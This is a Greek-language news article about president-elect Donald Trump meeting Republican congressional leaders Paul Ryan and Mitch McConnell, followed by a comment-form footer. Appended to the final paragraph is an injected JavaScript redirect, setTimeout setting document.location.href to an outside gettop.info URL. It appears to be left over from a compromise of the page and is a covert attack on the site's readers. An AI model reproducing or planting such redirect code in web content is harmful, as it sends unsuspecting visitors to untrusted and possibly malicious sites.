Ο Τραμπ συνάντησε τους ηγέτες των Ρεπουμπλικανών στο Κογκρέσο

0
3

 

Μετά την επίσκεψη στον Λευκό Οίκο ο νεοεκλεγείς πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ πήγε στο Καπιτώλιο για συναντήσεις με τους ηγέτες του Ρεπουμπλικανικού Κόμματος στο Κογκρέσο.

Τα περισσότερα από τα στελέχη αυτά είχαν τηρήσει αποστάσεις από την προεκλογική του εκστρατεία, οπότε ο ίδιος θέλησε να αποκαταστήσει τις σχέσεις του με τους ηγέτες των Ρεπουμπλικανών.

Οι Ρεπουμπλικανοί διατήρησαν τον έλεγχο του Κογκρέσου, της Γερουσίας και της Βουλής των Αντιπροσώπων, εξέλιξη που σηματοδοτεί ότι μερικές από τις προεκλογικές εξαγγελίες του Τραμπ θα βρουν πρόσφορο έδαφος για την ψήφισή τους από τα αναφερόμενα νομοθετικά σώματα των ΗΠΑ.

Τον Τραμπ συνόδευε ο αντιπρόεδρος του Μάικ Πενς, ενώ μετά τη συνάντησή του με τον Πολ Ράιν, ηγετικό στέλεχος των Ρεπουμπλικανών στη Βουλή των Αντιπροσώπων, ο ίδιος δήλωσε στους δημοσιογράφους: «Όπως ξέρετε θα προχωρήσουμε σε μείωση της φορολογίας. Επίσης, θα διορθώσουμε τις παροχές της δημόσιας υγείας, ώστε να είναι καλύτερη, αλλά και περισσότερο προσβάσιμη».

Παράλληλα, διαφάνηκε ότι ο Ράιαν θέλει ν’ αποκαταστήσει τις σχέσεις του με τον Τραμπ, με την εκπρόσωπό του Ας Λι Στρονγκ να δηλώνει ότι ο ίδιος «είναι ενθουσιασμένος με τη δυναμική μιας ενωτικής κυβέρνησης των Ρεπουμπλικάνων, ενώ ανυπομονεί να συνεργαστεί με τον Ντόναλντ Τραμπ».

Ο Τραμπ συναντήθηκε επίσης, με τον Μιτς Μακόνελ, ηγέτη της ρεπουμπλικανικής πλειοψηφίας στη Γερουσία, δηλώνοντας μετά τη συνάντηση ότι συζήτησε με τον γερουσιαστή, τις προτεραιότητές της διακυβέρνησης του, όπως ο έλεγχος της παράνομης μετανάστευσης στα σύνορα των ΗΠΑ, η αναδιοργάνωση του συστήματος παροχής δημόσιας υγείας αλλά και η δημιουργία νέων θέσεων εργασίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here